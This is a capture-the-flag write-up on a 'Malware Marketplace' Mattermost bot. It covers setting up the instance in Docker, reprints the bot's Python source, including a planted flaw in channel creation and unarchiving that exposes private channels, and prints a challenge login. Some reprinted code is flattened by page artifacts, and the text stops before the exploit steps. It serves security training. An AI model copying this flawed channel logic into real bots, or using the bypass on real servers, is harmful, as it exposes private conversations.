Task 6 - Crossing the Channel - (Vulnerability Research)
Description
This high visibility investigation has garnered a lot of agency attention. Due to your success, your team has designated you as the lead for the tasks ahead. Partnering with CNO and CYBERCOM mission elements, you work with operations to collect the persistent data associated with the identified Mattermost instance. Our analysts inform us that it was obtained through a one-time opportunity and we must move quickly as this may hold the key to tracking down our adversary! We have managed to create an account but it only granted us access to one channel. The adversary doesn’t appear to be in that channel.
We will have to figure out how to get into the same channel as the adversary. If we can gain access to their communications, we may uncover further opportunity.
You are tasked with gaining access to the same channel as the target. The only interface that you have is the chat interface in Mattermost!
Downloads:
- Mattermost instance (volumes.tar.gz)
- User login (user.txt)
Prompt:
- Submit a series of commands, one per line, given to the Mattermost server which will allow you to gain access to a channel with the adversary.
This time, we’re given a Mattermost instance, as volumes.tar.gz contains a db folder with the standard Mattermost PostgreSQL database files, and a bot folder that contains a sample Mattermost bot implementation in Python.
We also have a user login in user.txt:
cautiousferret5:NCfYJKXkdyrIterw
Before we look at the bot, let’s set up the Mattermost instance locally so that we can log in with the provided user and explore the application.
Mattermost setup
We don’t need to get too complicated, so let’s just set it up locally on our machine using Docker, following the Mattermost official Docker instructions.
First we clone the provided Docker repository and set up the environment file, using localhost as the domain since we’re running it locally. We also need to downgrade the PostgreSQL version, since db/var/lib/postgresql/data/PG_VERSION contains 13:
git clone https://github.com/mattermost/docker
cd docker
cp env.example .env
sed -i 's/DOMAIN=.*/DOMAIN=localhost/' .env
sed -i 's/POSTGRES_IMAGE_TAG=.*/POSTGRES_IMAGE_TAG=13-alpine/' .env
Warning:
The default PostgreSQL version in the Mattermost Docker repository at the time of writing is 18-alpine, which removed the /data suffix from the Docker volume path. Since we need to downgrade to PostgreSQL 13, we also need to adjust the volume path accordingly in docker-compose.yml. Open it up and change the database volume mapping from:
volumes:
  - ${POSTGRES_DATA_PATH}:/var/lib/postgresql
to:
volumes:
  - ${POSTGRES_DATA_PATH}:/var/lib/postgresql/data
Next we copy the volumes folder we extracted into the docker folder, then create the rest of the necessary folders, and set the correct permissions:
cp -r ../volumes .
sudo chmod -R 777 ./volumes/db
mkdir -p ./volumes/app/mattermost/{config,data,logs,plugins,client/plugins,bleve-indexes}
sudo chown -R 2000:2000 ./volumes/app/mattermost
We can skip all the certificate and nginx steps since we’re running locally, and simply deploy with Docker Compose:
docker compose -f docker-compose.yml -f docker-compose.without-nginx.yml up -d
And now we can log in with our provided creds and explore the Mattermost instance!

Using our cautiousferret5 account, we can see that we only have access to a public channel on a team called Malware Central:

The bot
Now that we have the Mattermost instance running, let’s look at the bot code in the bot folder. The bot is implemented in Python and uses the mmpy_bot library to interact with the Mattermost API. There are 7 files total:
- bot.py: The main bot loader.
- malware_database.py: An in-memory database for storing some malware and sale information.
- mmpy_bot_monkeypatch.py: A monkeypatch for the mmpy_bot library to add an option to plugin commands.
- plugin_admin.py: A plugin for admin util commands.
- plugin_managechannel.py: A plugin for managing channel posts.
- plugin_onboarding.py: A plugin for onboarding new users, mostly just sends a configurable announcement.
- plugin_sales.py: A plugin for handling sales of malware.
You can expand these to look at each one, but I’ll go over the relevant parts later.
bot.py:
#!/usr/bin/env python
import sys
from loguru import logger

# Set log level based on -v argument
if "-v" in sys.argv:
    logger.remove()
    logger.add(sys.stderr, level="DEBUG")
else:
    logger.remove()
    logger.add(sys.stderr, level="INFO")

import mmpy_bot_monkeypatch  # Ensure monkeypatch is applied before any plugin imports
from mmpy_bot import Bot, Settings
from mmpy_bot.plugins import HelpPlugin
from plugin_sales import SalesPlugin
from plugin_onboarding import OnboardingPlugin
from plugin_admin import AdminPlugin
from plugin_managechannel import ManageChannelPlugin
import os
from dotenv import load_dotenv

# Load environment variables from .env file
load_dotenv(os.path.join(os.path.dirname(__file__), '.env'))

bot = Bot(
    settings=Settings(
        MATTERMOST_URL = os.environ.get("MATTERMOST_URL", "http://127.0.0.1"),
        MATTERMOST_PORT = int(os.environ.get("MATTERMOST_PORT", 8065)),
        BOT_TOKEN = os.environ.get("BOT_TOKEN"),
        BOT_TEAM = os.environ.get("BOT_TEAM", "test_team"),
        SSL_VERIFY = os.environ.get("SSL_VERIFY", "False") == "True",
        RESPOND_CHANNEL_HELP=True,
    ),
    plugins=[SalesPlugin(), HelpPlugin(), OnboardingPlugin(),ManageChannelPlugin(),AdminPlugin()],
)
bot.run()
malware_database.py:
import os
import pickle
import threading
from loguru import logger
from functools import wraps

DB_FILE = os.path.join(os.path.dirname(__file__), 'malware_db.pkl')

# Decorator to lock all public methods
def locked_methods(cls):
    for attr_name, attr in cls.__dict__.items():
        if callable(attr) and not attr_name.startswith('_'):
            @wraps(attr)
            def locked(self, *args, __attr=attr, **kwargs):
                with self._lock:
                    return __attr(self, *args, **kwargs)
            setattr(cls, attr_name, locked)
    return cls

@locked_methods
class MalwareDatabase:
    def __init__(self, db_file=DB_FILE):
        self.db_file = db_file
        self._lock = threading.Lock()

    def _load_db(self):
        if not os.path.exists(self.db_file):
            return {'offerings': [], 'sales': []}
        with open(self.db_file, 'rb') as f:
            return pickle.load(f)

    def _save_db(self, db):
        with open(self.db_file, 'wb') as f:
            pickle.dump(db, f)

    def add_offering(self, offering):
        db = self._load_db()
        offering['id'] = len(db['offerings']) + 1
        logger.debug(f"Adding offering: {offering}")
        db['offerings'].append(offering)
        self._save_db(db)
        logger.info(f"Offering added with ID {offering['id']}")
        return offering['id']

    def get_offerings(self):
        db = self._load_db()
        logger.debug(f"Getting offerings: {db['offerings']}")
        return db['offerings']

    def record_sale(self, sale):
        db = self._load_db()
        logger.debug(f"Recording sale: {sale}")
        db['sales'].append(sale)
        self._save_db(db)
        logger.info(f"Sale recorded: {sale}")

    def get_sales(self):
        db = self._load_db()
        logger.debug(f"Getting sales: {db['sales']}")
        return db['sales']

# Singleton instance for use throughout the bot
db = MalwareDatabase()

# Usage in your plugin:
# from malware_database import db
# db.add_offering(...)
# db.get_offerings()
# db.record_sale(...)
# db.get_sales()
mmpy_bot_monkeypatch.py:
# mmpy_bot_monkeypatch.py
"""Monkey patch mmpy_bot MessageFunction to support no_direct option."""
from mmpy_bot.function import MessageFunction
from mmpy_bot.utils import completed_future
import fnmatch
from loguru import logger

# Save original methods
_original_init = MessageFunction.__init__
_original_call = MessageFunction.__call__

def patched_init(self, *args, allowed_users_glob=None, **kwargs):
    logger.debug(f"patched_init called for {getattr(self, 'name', None)} with allowed_users_glob={allowed_users_glob} and no_direct={kwargs.get('no_direct', False)}")
    _original_init(self, *args, **kwargs)
    self.no_direct = kwargs.get('no_direct', False)
    # allowed_users_glob setup
    if allowed_users_glob is not None:
        logger.debug(f"Setting allowed_users_glob: {allowed_users_glob}")
        self.allowed_users_glob = [pattern.lower() for pattern in allowed_users_glob]
    elif hasattr(self, 'allowed_users_glob'):
        logger.debug("allowed_users_glob already set")
        pass  # already set
    else:
        self.allowed_users_glob = []
        logger.debug("allowed_users_glob set to empty list")

def patched_call(self, message, *args):
    logger.debug(f"patched_call for {getattr(self, 'name', None)} from sender={message.sender_name}")
    # If no_direct is set and this is a direct message, skip
    if getattr(self, 'no_direct', False) and message.is_direct_message:
        logger.debug("no_direct is set and message is direct, skipping handler")
        return None if not self.is_coroutine else completed_future()
    # Combined exact and glob matching for allowed_users
    sender = message.sender_name.lower()
    allowed_exact = sender in getattr(self, 'allowed_users', [])
    allowed_glob = any(fnmatch.fnmatch(sender, pattern) for pattern in getattr(self, 'allowed_users_glob', []))
    logger.debug(f"allowed_exact={allowed_exact}, allowed_glob={allowed_glob}, allowed_users={getattr(self, 'allowed_users', [])}, allowed_users_glob={getattr(self, 'allowed_users_glob', [])}")
    if getattr(self, 'allowed_users', None) or getattr(self, 'allowed_users_glob', None):
        if not (allowed_exact or allowed_glob):
            logger.debug(f"Permission denied for sender={sender}")
            if not getattr(self, 'silence_fail_msg', False):
                self.plugin.driver.reply_to(
                    message, "You do not have permission to perform this action!"
                )
            return None if not self.is_coroutine else completed_future()
        else:
            logger.debug(f"Permission granted for sender={sender}")
    return _original_call(self, message, *args)

MessageFunction.__init__ = patched_init
MessageFunction.__call__ = patched_call
plugin_admin.py:
from mmpy_bot import Plugin
from mmpy_bot.scheduler import schedule
from loguru import logger
from malware_database import db
from mmpy_bot.function import listen_to
import subprocess

class AdminPlugin(Plugin):
    """
    A plugin to handle administration utilities
    """

    @listen_to("^!util df", allowed_users_glob=["mod_*","admin_*"])
    def df_cmd(self, message ):
        logger.info(f"AdminPlugin: running df")
        result = subprocess.run(["df", "-h", "-x", "tmpfs"],capture_output=True, text=True)
        self.driver.reply_to(message, f"{result.stdout}")

    @listen_to("^!util uptime$", allowed_users_glob=["mod_*","admin_*"])
    def uptime_cmd(self, message):
        logger.info("AdminPlugin: running uptime")
        result = subprocess.run(["uptime"], capture_output=True, text=True)
        self.driver.reply_to(message, f"{result.stdout}")

    @listen_to("^!util free$", allowed_users_glob=["mod_*","admin_*"])
    def free_cmd(self, message):
        logger.info("AdminPlugin: running free -h")
        result = subprocess.run(["free", "-h"], capture_output=True, text=True)
        self.driver.reply_to(message, f"{result.stdout}")
plugin_managechannel.py:
from mmpy_bot_monkeypatch import *  # Ensure monkeypatch is applied before anything else
from mmpy_bot import Plugin, Message, listen_to
from malware_database import db
from loguru import logger

def get_pinned(driver, message: Message, *args):
    logger.debug(f"handle_get_pinned called with message: {message.text}")
    team_name = driver.options.get('team', 'malwarecentral')
    print(f"[DEBUG] Looking up team: {team_name}")
    # Get team info
    team = driver.teams.get_team_by_name(team_name)
    channel_id = message.channel_id
    posts = driver.channels.get_pinned_posts(channel_id)
    logger.info(f"found pinned posts {posts}")
    order= posts["order"]
    all_pinned ={}
    for post in order:
        all_pinned[post] = posts["posts"][post]["message"]
    logger.info(f"respons is {all_pinned}")
    return all_pinned

class ManageChannelPlugin(Plugin):
    """
    A plugin to handle Managing Channel Posts
    """

    @listen_to('^!delete nonpinned', no_direct=True,human_description="!delete nonpinned\n\tget rid of any posts that aren't pinned")
    def handle_delete_nonpinned(self : Plugin, message: Message, *args):
        all_pinned = get_pinned(self.driver, message)
        channel_id = message.channel_id
        posts = self.driver.posts.get_posts_for_channel(channel_id)["order"]
        logger.info(f"got {len(posts)} posts for this channel")
        logger.info(posts)
        logger.info(all_pinned)
        #loop through every post and delete the ones that aren't pinned
        count = 0
        while (len(posts) > len(all_pinned.items())):
            for post in posts:
                if post not in all_pinned:
                    self.driver.posts.delete_post(post)
                    count += 1
            posts = self.driver.posts.get_posts_for_channel(channel_id)["order"]
            logger.info(f"got {len(posts)} posts for this channel")
plugin_onboarding.py:
from mmpy_bot import Plugin
from mmpy_bot.scheduler import schedule
from loguru import logger
from malware_database import db
from mmpy_bot.function import listen_to

ANNOUNCEMENT_CHANNEL = "public"
ANNOUNCEMENT_RULES = """Welcome to the Malware Marketplace! Please read the rules and stay safe.
1. Do not discuss illegal activities
2. Do not wreak havoc
3. Do not make $$$$
4. Don't even consider HACK(ing) THE PLANET
5. Always buck authority

Current info and updates will appear here."""
ANNOUNCEMENT_MIDDLE = "No current announcements"

class OnboardingPlugin(Plugin):
    """Plugin to send onboarding/welcome/rules announcements."""

    def on_start(self):
        self.announcement_middle = ANNOUNCEMENT_MIDDLE
        logger.info(f"PluginOnboarding: Sending initial announcement to {ANNOUNCEMENT_CHANNEL}")
        self.send_announcement()
        schedule.every(1).hours.do(self.send_announcement)

    @listen_to("^!update_announcement (.+)$", allowed_users_glob=["mod_*"])
    def update_announcement_cmd(self, message, new_middle):
        logger.info(f"PluginOnboarding: Announcement middle updated by {message.sender_name}")
        self.announcement_middle = new_middle
        self.send_announcement()
        self.driver.reply_to(message, "Announcement updated and sent.")

    def send_announcement(self):
        # Get team name from driver options
        team_name = self.settings.BOT_TEAM
        # Get channel info by name and team name (works for public/private)
        channel = self.driver.channels.get_channel_by_name_for_team_name(team_name, ANNOUNCEMENT_CHANNEL)
        channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id')
        # Get current offerings
        offerings = db.get_offerings()
        offerings_text = "Current Offerings:\n" + "\n".join([
            f"ID: {o['id']}, Name: {o['name']}, Type: {o['type']}, OS: {o['os']}, Price: {o['price']}"
            for o in offerings
        ]) if offerings else "No current offerings."
        announcement = f"{ANNOUNCEMENT_RULES}\n\n{self.announcement_middle}\n\n{offerings_text}"
        logger.debug(f"PluginOnboarding: Sending announcement to channel_id={channel_id}")
        self.driver.create_post(channel_id=channel_id, message=announcement)
plugin_sales.py:
from mmpy_bot_monkeypatch import *  # Ensure monkeypatch is applied before anything else
from mmpy_bot import Plugin, Message, listen_to
from malware_database import db
from loguru import logger

MALWARE_TYPES = ["0click", "1click", "LPE", "SBE", "RCE", "Phishing", "ExploitKit", "Backdoor", "Rootkit"]
OS_TYPES = ["Windows", "Linux", "macOS", "Android", "iOS", "Unix"]
ODAYS = ["0day", "nday"]

class SalesPlugin(Plugin):
    """
    A plugin to handle sales in Mattermost.
    """

    @listen_to('^!nego (.*)$', no_direct=True,human_description="!nego channel seller moderator1 moderator2\n\tCreate a negotiation channel to close a deal!")
    def handle_nego(self : Plugin, message: Message, *args):
        logger.debug(f"handle_nego called with message: {message.text}")
        args = message.text.strip().split()
        if len(args) != 5:
            self.driver.reply_to(message, "Usage: !nego channel seller moderator1 moderator2")
            logger.warning("handle_nego: Incorrect number of arguments")
            return
        user1 = message.sender_name
        _, channel_name, user2, user3, user4 = args[:6]
        if not user4.startswith('mod_'):
            self.driver.reply_to(message, f"You must have a mod")
            return
        display_name = channel_name
        team_name = self.driver.options.get('team', 'malwarecentral')
        print(f"[DEBUG] Looking up team: {team_name}")
        # Get team info
        team = self.driver.teams.get_team_by_name(team_name)
        logger.debug(f"Team API response: {team}")
        team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
        print(f"[DEBUG] team_id: {team_id}")
        # Create channel
        channel_options = {
            "team_id": team_id,
            "name": channel_name,
            "display_name": display_name,
            "type": "P"
        }
        logger.debug(f"Creating channel with options: {channel_options}")
        try:
            channel = self.driver.channels.create_channel(channel_options)
            print(f"[DEBUG] Channel API response: {channel}")
        #hide weird exception when we have an archived channel with the same name, we'll just unarchive it
        except Exception as e:
            print(f"[DEBUG] Exception while creating channel: {e}")
            # Try to unarchive the channel if it exists
            try:
                archived_channel = self.driver.channels.get_channel_by_name(channel_name, team_id)
                if archived_channel and archived_channel.get('delete_at') > 0:
                    logger.info(f"Unarchiving existing channel: {archived_channel}")
                    self.driver.channels.unarchive_channel(archived_channel.get('id'))
                    channel = archived_channel
            except Exception as e:
                self.driver.reply_to(message, f"Failed to create or unarchive channel: {e}")
        #we either created a new channel or unarchived an existing one
        print(f"[DEBUG] getting channel: {channel_name} in team {team_id}")
        channel = self.driver.channels.get_channel_by_name(team_id, channel_name)
        channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id')
        print(f"[DEBUG] channel_id: {channel_id}")
        # Get user ids
        user_ids = []
        for uname in [user1, user2, user3, user4]:
            logger.debug(f"Looking up user: {uname}")
            user = self.driver.users.get_user_by_username(uname)
            logger.debug(f"User API response: {user}")
            uid = user.get('id') if isinstance(user, dict) else user.json().get('id')
            logger.debug(f"user_id for {uname}: {uid}")
            if not uid:
                self.driver.reply_to(message, f"User not found: {uname}")
                logger.warning(f"handle_nego: User not found: {uname}")
                return
            user_ids.append(uid)
        if len(set(user_ids)) != 4:
            logger.warning(f"incorrect number of users to run command")
            self.driver.reply_to(message, f"incorrect number of users to run command")
            return
        print(f"[DEBUG] All user_ids: {user_ids}")

        # Check if channel already has members
        existing_members = self.driver.channels.get_channel_members(channel_id)
        existing_member_user_ids = [member.get('user_id') for member in existing_members]
        existing_user_ids = any(uid in user_ids for uid in existing_member_user_ids)
        if existing_user_ids:
            # If the channel already has members, we should not add them again
            # This is a safeguard against creating duplicate entries in an archived channel
            print(f"[DEBUG] Existing members in channel {channel_id}: {existing_member_user_ids}, this shouldn't happen! archived channels should be empty")
            return
        # make sure not adding randos
        current_members_ids = [m['user_id'] for m in self.driver.channels.get_channel_members(message.channel_id)]
        if not (user_ids[0] in current_members_ids and user_ids[1] in current_members_ids and user_ids[2] in current_members_ids and user_ids[3] in current_members_ids):
            self.driver.reply_to(message, f"Could not find users")
            return

        # Add users to channel
        for uid in user_ids:
            logger.debug(f"Adding user {uid} to channel {channel_id}")
            self.driver.channels.add_channel_member(channel_id, {"user_id": uid})
        self.driver.reply_to(message, f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")
        logger.info(f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")

    @listen_to('^!add_offering (.*)$', no_direct=True,allowed_users_glob=["mod_*"], human_description="!add_offering name type os oday_or_nday creator price\n\tAdd a new malware offering.")
    def add_offering_cmd(self, message: Message, *args):
        args = message.text.strip().split()
        logger.debug(f"add_offering_cmd called with args: {args}")
        if len(args) != 7:
            self.driver.reply_to(message, "Usage: !add_offering name type os oday_or_nday creator price")
            logger.warning("add_offering: Incorrect number of arguments")
            return
        _, name, mtype, osys, oday_nday, creator, price = args
        mtype_lc = mtype.lower()
        osys_lc = osys.lower()
        oday_nday_lc = oday_nday.lower()
        logger.debug(f"Normalized values: type={mtype_lc}, os={osys_lc}, oday_nday={oday_nday_lc}")
        if mtype_lc not in [t.lower() for t in MALWARE_TYPES]:
            self.driver.reply_to(message, f"Invalid malware type. Allowed: {', '.join(MALWARE_TYPES)}")
            logger.warning(f"add_offering: Invalid malware type '{mtype}'")
            return
        if osys_lc not in [o.lower() for o in OS_TYPES]:
            self.driver.reply_to(message, f"Invalid OS. Allowed: {', '.join(OS_TYPES)}")
            logger.warning(f"add_offering: Invalid OS '{osys}'")
            return
        if oday_nday_lc not in [d.lower() for d in ODAYS]:
            self.driver.reply_to(message, "oday_or_nday must be '0day' or 'nday'.")
            logger.warning(f"add_offering: Invalid oday_or_nday '{oday_nday}'")
            return
        team_name = self.driver.options.get('team', 'malwarecentral')
        team = self.driver.teams.get_team_by_name(team_name)
        team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
        user = self.driver.users.get_user_by_username(creator)
        if not user or (user.get('id') if isinstance(user, dict) else user.json().get('id')) is None:
            self.driver.reply_to(message, f"Creator '{creator}' is not a valid user in the team.")
            logger.warning(f"add_offering: Creator '{creator}' is not a valid user in the team.")
            return
        try:
            price_val = float(price)
            if price_val < 0:
                raise ValueError
        except ValueError:
            self.driver.reply_to(message, "Price must be a positive number.")
            logger.warning(f"add_offering: Invalid price '{price}'")
            return
        offering = {
            'name': name,
            'type': mtype_lc,
            'os': osys_lc,
            'oday_or_nday': oday_nday_lc,
            'creator': creator,
            'price': price_val
        }
        logger.info(f"Adding offering: {offering}")
        oid = db.add_offering(offering)
        self.driver.reply_to(message, f"Offering added with ID {oid}.")
        logger.info(f"Offering added with ID {oid}")

    @listen_to('^!get_offerings (.*)$', no_direct=True, human_description="!get_offerings\n\tList all malware offerings.")
    def get_offerings_cmd(self, message: Message, *args):
        logger.debug(f"get_offerings_cmd called with message: {message.text}")
        offerings = db.get_offerings()
        logger.debug(f"Offerings retrieved: {offerings}")
        if not offerings:
            self.driver.reply_to(message, "No offerings available.")
            logger.info("get_offerings_cmd: No offerings available.")
            return
        msg = "Malware Offerings:\n" + "\n".join([
            f"ID: {o['id']}, Name: {o['name']}, Type: {o['type']}, OS: {o['os']}, Oday/Nday: {o['oday_or_nday']}, Creator: {o['creator']}, Price: {o['price']}"
            for o in offerings
        ])
        self.driver.reply_to(message, msg)
        logger.info("get_offerings_cmd: Sent offerings list.")

    #TODO update these users to be other admins we expect to be listed within the team
    @listen_to('^!record_sale (.*)$', no_direct=True, allowed_users_glob=["mod_*"],human_description="!record_sale buyer price offering_id\n\tRecord a sale of malware.",allowed_users=["badguy","otherbadguy","some guys","user1"])
    def record_sale_cmd(self, message: Message, *args):
        logger.debug(f"record_sale_cmd called with message: {message.text}")
        args = message.text.strip().split()
        if len(args) != 4:
            self.driver.reply_to(message, "Usage: !record_sale buyer price offering_id")
            logger.warning("record_sale_cmd: Incorrect number of arguments")
            return
        _, buyer, price, offering_id = args
        # Validate buyer is a user in the team
        team_name = self.driver.options.get('team', 'malwarecentral')
        team = self.driver.teams.get_team_by_name(team_name)
        team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
        user = self.driver.users.get_user_by_username(buyer)
        if not user or (user.get('id') if isinstance(user, dict) else user.json().get('id')) is None:
            self.driver.reply_to(message, f"Buyer '{buyer}' is not a valid user in the team.")
            logger.warning(f"record_sale_cmd: Buyer '{buyer}' is not a valid user in the team.")
            return
        # Seller is the creator of the offering
        offerings = db.get_offerings()
        offering = next((o for o in offerings if str(o['id']) == offering_id), None)
        if not offering:
            self.driver.reply_to(message, f"Offering ID {offering_id} not found.")
            logger.warning(f"record_sale_cmd: Offering ID {offering_id} not found.")
            return
        seller = offering['creator']
        sale = {
            'buyer': buyer,
            'seller': seller,
            'price': price,
            'offering_id': offering_id
        }
        logger.info(f"Recording sale: {sale}")
        db.record_sale(sale)
        self.driver.reply_to(message, f"Sale recorded for offering ID {offering_id}.")
        logger.info(f"Sale recorded for offering ID {offering_id}")

The way mmpy_bot works is that it listens for messages in channels and direct messages, and when a message matches a registered command pattern, it calls the corresponding handler function in the plugin.
@listen_to("^!util uptime$", allowed_users_glob=["mod_*","admin_*"])
def uptime_cmd(self, message):
    logger.info("AdminPlugin: running uptime")
    result = subprocess.run(["uptime"], capture_output=True, text=True)
    self.driver.reply_to(message, f"{result.stdout}")

For example, this command listens for messages that match the regex ^!util uptime$ and are sent by users whose usernames match the glob patterns mod_* or admin_*. When such a message is received, it runs the uptime_cmd function, which executes the uptime command on the server and replies with the output.
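To make the username restriction concrete, here is a minimal sketch of the exact-or-glob check that the monkeypatch performs before a handler runs. The helper name is_allowed and the usernames mod_example and Admin_Example are made up for illustration; only cautiousferret5 and the glob patterns come from the challenge files.

```python
import fnmatch


def is_allowed(sender, allowed_users=(), allowed_users_glob=()):
    """Hypothetical helper mirroring the monkeypatch's permission logic.

    A sender passes if no restriction is configured, or if the lowercased
    username matches an exact entry or any glob pattern.
    """
    sender = sender.lower()
    if not allowed_users and not allowed_users_glob:
        return True  # unrestricted command
    exact = sender in allowed_users
    glob = any(fnmatch.fnmatch(sender, p.lower()) for p in allowed_users_glob)
    return exact or glob


patterns = ["mod_*", "admin_*"]
print(is_allowed("cautiousferret5", allowed_users_glob=patterns))  # False
print(is_allowed("mod_example", allowed_users_glob=patterns))      # True
print(is_allowed("Admin_Example", allowed_users_glob=patterns))    # True
```

Since our username has neither prefix, any command carrying these patterns rejects us before its handler body is reached.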
Some of the commands also have a no_direct=True option, which means they will not respond to direct messages. This is implemented in the monkeypatch in mmpy_bot_monkeypatch.py.
# mmpy_bot_monkeypatch.py
"""Monkey patch mmpy_bot MessageFunction to support no_direct option."""
from mmpy_bot.function import MessageFunction
from mmpy_bot.utils import completed_future
import fnmatch
from loguru import logger

# Save original methods
_original_init = MessageFunction.__init__
_original_call = MessageFunction.__call__

def patched_init(self, *args, allowed_users_glob=None, **kwargs):
    logger.debug(f"patched_init called for {getattr(self, 'name', None)} with allowed_users_glob={allowed_users_glob} and no_direct={kwargs.get('no_direct', False)}")
    _original_init(self, *args, **kwargs)
    self.no_direct = kwargs.get('no_direct', False)
    # allowed_users_glob setup
    if allowed_users_glob is not None:
        logger.debug(f"Setting allowed_users_glob: {allowed_users_glob}")
        self.allowed_users_glob = [pattern.lower() for pattern in allowed_users_glob]
    elif hasattr(self, 'allowed_users_glob'):
        logger.debug("allowed_users_glob already set")
        pass  # already set
    else:
        self.allowed_users_glob = []
        logger.debug("allowed_users_glob set to empty list")

def patched_call(self, message, *args):
    logger.debug(f"patched_call for {getattr(self, 'name', None)} from sender={message.sender_name}")
    # If no_direct is set and this is a direct message, skip
    if getattr(self, 'no_direct', False) and message.is_direct_message:
        logger.debug("no_direct is set and message is direct, skipping handler")
        return None if not self.is_coroutine else completed_future()

    # Combined exact and glob matching for allowed_users
    sender = message.sender_name.lower()
    allowed_exact = sender in getattr(self, 'allowed_users', [])
    allowed_glob = any(fnmatch.fnmatch(sender, pattern) for pattern in getattr(self, 'allowed_users_glob', []))
    logger.debug(f"allowed_exact={allowed_exact}, allowed_glob={allowed_glob}, allowed_users={getattr(self, 'allowed_users', [])}, allowed_users_glob={getattr(self, 'allowed_users_glob', [])}")
    if getattr(self, 'allowed_users', None) or getattr(self, 'allowed_users_glob', None):
        if not (allowed_exact or allowed_glob):
            logger.debug(f"Permission denied for sender={sender}")
            if not getattr(self, 'silence_fail_msg', False):
                self.plugin.driver.reply_to(
                    message, "You do not have permission to perform this action!"
                )
            return None if not self.is_coroutine else completed_future()
        else:
            logger.debug(f"Permission granted for sender={sender}")
    return _original_call(self, message, *args)

MessageFunction.__init__ = patched_init
MessageFunction.__call__ = patched_call

Unfortunately for us, most of the commands have some restrictions that prevent our user, cautiousferret5, from using them. Here’s a list of every command, and if we can use it or not:
# plugin_admin.py
@listen_to("^!util df", allowed_users_glob=["mod_*","admin_*"])
@listen_to("^!util uptime$", allowed_users_glob=["mod_*","admin_*"])
@listen_to("^!util free$", allowed_users_glob=["mod_*","admin_*"])

# plugin_managechannel.py
@listen_to('^!delete nonpinned', no_direct=True,human_description="!delete nonpinned\n\tget rid of any posts that aren't pinned")

# plugin_onboarding.py
@listen_to("^!update_announcement (.+)$", allowed_users_glob=["mod_*"])

# plugin_sales.py
@listen_to('^!nego (.*)$', no_direct=True,human_description="!nego channel seller moderator1 moderator2\n\tCreate a negotiation channel to close a deal!")
@listen_to('^!add_offering (.*)$', no_direct=True,allowed_users_glob=["mod_*"], human_description="!add_offering name type os oday_or_nday creator price\n\tAdd a new malware offering.")
@listen_to('^!get_offerings (.*)$', no_direct=True, human_description="!get_offerings\n\tList all malware offerings.")
@listen_to('^!record_sale (.*)$', no_direct=True, allowed_users_glob=["mod_*"],human_description="!record_sale buyer price offering_id\n\tRecord a sale of malware.",allowed_users=["badguy","otherbadguy","some guys","user1"])

Any command with an allowed_users or allowed_users_glob restriction is off-limits to us, since our username matches none of the patterns. Of the commands that remain, the only one that adds users to channels is the !nego command in plugin_sales.py. This command allows us to create a negotiation channel with a seller and two moderators.
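The decorators listed above can be checked mechanically. The following is a rough sketch, not part of the bot: the COMMANDS table is transcribed by hand from the decorators, usable_by is a made-up helper, and mod_example is a hypothetical moderator name. It ignores no_direct, which only affects direct messages.

```python
import fnmatch

# (command, allowed_users_glob, allowed_users), transcribed from the decorators.
COMMANDS = [
    ("!util df", ["mod_*", "admin_*"], []),
    ("!util uptime", ["mod_*", "admin_*"], []),
    ("!util free", ["mod_*", "admin_*"], []),
    ("!delete nonpinned", [], []),
    ("!update_announcement", ["mod_*"], []),
    ("!nego", [], []),
    ("!add_offering", ["mod_*"], []),
    ("!get_offerings", [], []),
    ("!record_sale", ["mod_*"], ["badguy", "otherbadguy", "some guys", "user1"]),
]


def usable_by(username):
    """Return the commands whose user restrictions (if any) admit this username."""
    sender = username.lower()
    usable = []
    for name, globs, exact in COMMANDS:
        restricted = bool(globs or exact)
        matches = sender in exact or any(fnmatch.fnmatch(sender, g) for g in globs)
        if not restricted or matches:
            usable.append(name)
    return usable


print(usable_by("cautiousferret5"))
# ['!delete nonpinned', '!nego', '!get_offerings']
```

Of the three commands left to us, only !nego touches channel membership, which is why the rest of the analysis focuses on it.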
@listen_to('^!nego (.*)$', no_direct=True,human_description="!nego channel seller moderator1 moderator2\n\tCreate a negotiation channel to close a deal!")def handle_nego(self : Plugin, message: Message, *args): logger.debug(f"handle_nego called with message: {message.text}") args = message.text.strip().split() if len(args) != 5:3 collapsed lines
self.driver.reply_to(message, "Usage: !nego channel seller moderator1 moderator2") logger.warning("handle_nego: Incorrect number of arguments") return user1 = message.sender_name _, channel_name, user2, user3, user4 = args[:6] if not user4.startswith('mod_'): self.driver.reply_to(message, f"You must have a mod") return19 collapsed lines
    display_name = channel_name
    team_name = self.driver.options.get('team', 'malwarecentral')
    print(f"[DEBUG] Looking up team: {team_name}")
    # Get team info
    team = self.driver.teams.get_team_by_name(team_name)
    logger.debug(f"Team API response: {team}")
    team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
    print(f"[DEBUG] team_id: {team_id}")
    # Create channel
    channel_options = {
        "team_id": team_id,
        "name": channel_name,
        "display_name": display_name,
        "type": "P"
    }
    logger.debug(f"Creating channel with options: {channel_options}")
    try:
        channel = self.driver.channels.create_channel(channel_options)
        print(f"[DEBUG] Channel API response: {channel}")
    #hide weird exception when we have an archived channel with the same name, we'll just unarchive it
    except Exception as e:
        print(f"[DEBUG] Exception while creating channel: {e}")
        # Try to unarchive the channel if it exists
        try:
            archived_channel = self.driver.channels.get_channel_by_name(channel_name, team_id)
            if archived_channel and archived_channel.get('delete_at') > 0:
                logger.info(f"Unarchiving existing channel: {archived_channel}")
                self.driver.channels.unarchive_channel(archived_channel.get('id'))
                channel = archived_channel
        except Exception as e:
            self.driver.reply_to(message, f"Failed to create or unarchive channel: {e}")
    #we either created a new channel or unarchived an existing one
    print(f"[DEBUG] getting channel: {channel_name} in team {team_id}")
    channel = self.driver.channels.get_channel_by_name(team_id, channel_name)
    channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id')
    print(f"[DEBUG] channel_id: {channel_id}")
    # Get user ids
    user_ids = []
    for uname in [user1, user2, user3, user4]:
        logger.debug(f"Looking up user: {uname}")
        user = self.driver.users.get_user_by_username(uname)
        logger.debug(f"User API response: {user}")
        uid = user.get('id') if isinstance(user, dict) else user.json().get('id')
        logger.debug(f"user_id for {uname}: {uid}")
        if not uid:
            self.driver.reply_to(message, f"User not found: {uname}")
            logger.warning(f"handle_nego: User not found: {uname}")
            return
        user_ids.append(uid)
    if len(set(user_ids)) != 4:
